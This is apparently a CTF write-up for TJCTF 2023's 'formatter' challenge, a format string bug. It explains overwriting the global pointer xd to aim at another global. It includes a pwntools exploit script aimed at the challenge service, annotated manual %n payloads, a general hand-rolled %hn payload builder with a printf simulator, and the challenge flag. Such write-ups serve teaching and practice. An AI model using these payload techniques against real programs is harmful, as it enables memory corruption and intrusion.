HyggeHalcyon
TJCTF 2023

formatter

overwriting global variable


Last updated 1 year ago

Problem

Description

give me a string, any string!

nc tjc.tf 31764

Solution

As the challenge name suggests, this is a format string vulnerability. In main, after the program reads our buffer, it passes that buffer straight to printf as the format string, so any % specifiers we supply are interpreted. That lets us read values off the stack and, with %n, write to memory.

main also calls calloc(1, 4) and stores the returned heap pointer in the global variable xd. It then calls r1 with our buffer as the argument, but that argument is not relevant to the exploit.

The relevant line of r1 is the fifth line of its decompilation: it dereferences xd and adds two to the value it points to. It does not change the value of xd itself (the address calloc returned); it adds 2 to the 4-byte integer stored in the calloc'd chunk that xd points to.

For win to print the flag, the integer at the address held in xd must equal 0x86a693e (the exploit below writes 0x86a693c, and the 2 that r1 adds brings it to that value). The problem is that the heap address calloc returns changes between runs, so we cannot aim a blind format string write at the chunk directly. Recall from main that there is a second global variable, among. Instead of writing into the heap chunk, we overwrite xd itself so that it points to among; since PIE is disabled, both globals sit at fixed addresses (xd at 0x403440, among at 0x403460). We then write the desired value into among, and r1's increment of *xd produces exactly what win compares against. Both writes go through the same printf call, so the format string has to carry both the new pointer for xd and the value for among.

exploit.py
#!/usr/bin/env python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './chall'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'
host = 'tjc.tf'
port = 31764

def start(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.REMOTE: 
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
init-pwndbg
break *0x40139c
break *0x004013ad
break *0x004012a4
break *0x04011d4
'''.format(**locals())

# =========================================================
#                         FUZZING
# =========================================================
io = start()
# fuzz the stack: our buffer (AAAAAAAA -> 4141414141414141) shows up as the 6th argument, i.e. %6$p
io.sendlineafter(b'give me a string (or else): ', b'AAAAAAAA.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx')
print(io.recvall(timeout=2))  # read the leaked stack words so the offset can be seen
io.close()

# =========================================================
#                         ADDRESSES
# =========================================================
xd = elf.sym['xd'] # 0x403440, global holding the calloc'd pointer (fixed, no PIE)
among = elf.sym['among'] # 0x403460, second global at a fixed address
value = 0x86a693c # win() checks *xd against 0x86a693e; r1() does *xd += 2 first
padding = b'\x01' * 3 # pads the 45-byte manual format text to 48 bytes (6 qwords)

# =========================================================
#                         EXPLOITS
# =========================================================
io = start()

# reference : https://www.youtube.com/watch?v=9SWYvhY5dYw
# reference : https://www.youtube.com/watch?v=KgDeMJNK5BU

# 1st overwrite (write the desired value to among)
# 2nd overwrite (a pointer that xd holds, overwrite it into among)

# 1st write 2nd overwrite -> (0x60) ->  96 - 0 = 96 to xd (hhn)
# 1st write 1st overwrite -> (0x086a) -> 2154 - 96 = 2058 to among + 2 (n)
# 2nd write 2nd overwrite -> (0x4034) -> 16372 - 96 = 14218 to xd + 1 (n)
# 2nd write 1st overwrite -> (0x693c) -> 26940 - 2154 = 10568 to among (hn)

# this doesn't work; the defects are visible in the string itself:
#  - the 3rd and 4th specifiers (%16n, %17hn) lack the '$', so they are not positional writes
#  - 0x4034 is 16436, not 16372, and each width must be the difference from the running total:
#    16436 - 2154 = 14282 for the 3rd write and 26940 - 16436 = 10504 for the 4th
#  - the format text is 45 + 3 = 48 bytes = 6 qwords, so with the buffer at argument 6 the
#    addresses start at argument 12, not 14
payload_manual = b'%96X%14$hhn' + b'%2058X%15$n' + b'%14218X%16n' + b'%10568X%17hn' + padding + p64(xd) + p64(among + 2) + p64(xd + 1) + p64(among)

# pwntools works out the widths and positional indices for both writes from offset 6
payload_auto = fmtstr_payload(6, {among : value, xd : among})

io.sendlineafter(b'give me a string (or else): ', payload_auto)
print(io.recvall())

I tried to craft the payload on my own; however, it doesn't seem to work. Instead, we can use the format string payload helper provided by pwntools, which works just fine.
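To make the arithmetic behind the strategy above (point xd at among, then write the value into among) and behind the manual payload concrete, here is an added example that is not part of the original writeup and is not pwntools' fmtstr_payload. It builds the same two writes by hand as 16-bit %hn chunks, iterating the positional indices to a fixed point because the number of digits in those indices changes the length of the format text, and then runs the result through a small model of printf's %c/%n behaviour to check that xd ends up pointing at among and that *xd + 2 equals the value win expects. The addresses of xd and among and the target value are the ones from the writeup; the initial heap pointer stored in xd (0x4052a0) is a constructed placeholder, and the model only counts characters, it does not track which argument each %c consumes.

```python
#!/usr/bin/env python3
"""Hand-rolled %n format string write plus a tiny printf model to check it.

Added example for the formatter writeup; not the original exploit and not
pwntools' fmtstr_payload. Addresses and the target value are the ones the
writeup uses; the initial heap pointer in xd is a constructed placeholder.
"""
import re
import struct

XD = 0x403440          # global holding the calloc'd pointer (no PIE, fixed address)
AMONG = 0x403460       # second global, also at a fixed address
VALUE = 0x86a693c      # win() wants 0x86a693e; r1() adds 2 to *xd first
HEAP_CHUNK = 0x4052a0  # constructed placeholder for the calloc'd address


def split_shorts(addr, value, size):
    """Split a little-endian `size`-byte value into (address, 16-bit chunk) pairs."""
    return [(addr + i, (value >> (8 * i)) & 0xffff) for i in range(0, size, 2)]


def first_address_index(offset, fmt_len):
    """Argument index of the first 8-byte address placed right after `fmt_len`
    bytes of format text, when the buffer itself starts at argument `offset`."""
    return offset + -(-fmt_len // 8)


def build_payload(offset, writes):
    """offset: stack argument index where our buffer starts (6 in the writeup).
    writes:  {addr: (value, size_in_bytes)}.
    Returns (payload, total_chars_printed). Layout: %c/%hn specifiers, padding
    to a multiple of 8, then the little-endian target addresses."""
    chunks = []
    for addr, (value, size) in writes.items():
        chunks += split_shorts(addr, value, size)
    # Ascending chunk values: the running character count only ever grows.
    chunks.sort(key=lambda c: c[1])
    n_qwords = 1  # slots taken by the format text; iterate to a fixed point
    while True:
        fmt, printed = b'', 0
        for i, (_, chunk) in enumerate(chunks):
            need = (chunk - printed) % 0x10000
            if need:
                fmt += b'%%%dc' % need  # %Nc prints exactly N characters
                printed += need
            fmt += b'%%%d$hn' % (offset + n_qwords + i)  # store low 16 bits of count
        padded = fmt.ljust(-(-len(fmt) // 8) * 8, b'\x01')
        if len(padded) // 8 == n_qwords:
            break
        n_qwords = len(padded) // 8  # indices grew a digit; rebuild with the new slot count
    addresses = b''.join(struct.pack('<Q', addr) for addr, _ in chunks)
    return padded + addresses, printed


SPEC = re.compile(rb'%(?:(\d+)c|(\d+)\$(hh|h|)n)')


def simulate_printf(payload, offset, memory):
    """Model printf(buffer) for the specifiers we emit: %Nc adds N to the count,
    %k$[hh|h]n stores the count at the address held in argument k, literal bytes
    count one each, and parsing stops at the first NUL. Argument k >= offset is
    read from the payload itself, 8 bytes per slot."""
    def arg(k):
        lo = (k - offset) * 8
        return struct.unpack('<Q', payload[lo:lo + 8])[0]

    fmt = payload.split(b'\x00', 1)[0]
    count, pos = 0, 0
    while pos < len(fmt):
        m = SPEC.match(fmt, pos)
        if not m:
            count, pos = count + 1, pos + 1
            continue
        if m.group(1):
            count += int(m.group(1))
        else:
            size = {b'hh': 1, b'h': 2, b'': 4}[m.group(3)]
            addr = arg(int(m.group(2)))
            for i in range(size):
                memory[addr + i] = (count >> (8 * i)) & 0xff
        pos = m.end()
    return count


def read_mem(memory, addr, size):
    return int.from_bytes(bytes(memory.get(addr + i, 0) for i in range(size)), 'little')


def exploit_state(offset=6):
    """Build the payload, run the model, and return (payload, *xd after printf,
    the value win() would see after r1() adds 2)."""
    payload, _ = build_payload(offset, {AMONG: (VALUE, 4), XD: (AMONG, 8)})
    memory = {}
    for i in range(8):  # xd starts out holding the heap pointer
        memory[XD + i] = (HEAP_CHUNK >> (8 * i)) & 0xff
    simulate_printf(payload, offset, memory)
    xd_ptr = read_mem(memory, XD, 8)
    return payload, xd_ptr, read_mem(memory, xd_ptr, 4) + 2


if __name__ == '__main__':
    payload, xd_ptr, seen_by_win = exploit_state()
    print(payload)
    print('xd ->', hex(xd_ptr), ' *xd + 2 =', hex(seen_by_win))
```

Against the real service one would send build_payload(6, {among: (value, 4), xd: (among, 8)})[0] in place of payload_auto. The generated string prints 0x693c = 26940 characters in total, and first_address_index(6, 48) returns 12, which is where the addresses in the manual payload actually sat rather than the 14 it assumed.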

Flag

tjctf{f0rm4tt3d_5883cc30}

Figures from the original page (images not reproduced): checksec output; decompiled main; decompiled r1; decompiled win; returned value after overwriting, in plain mode and in hexdump.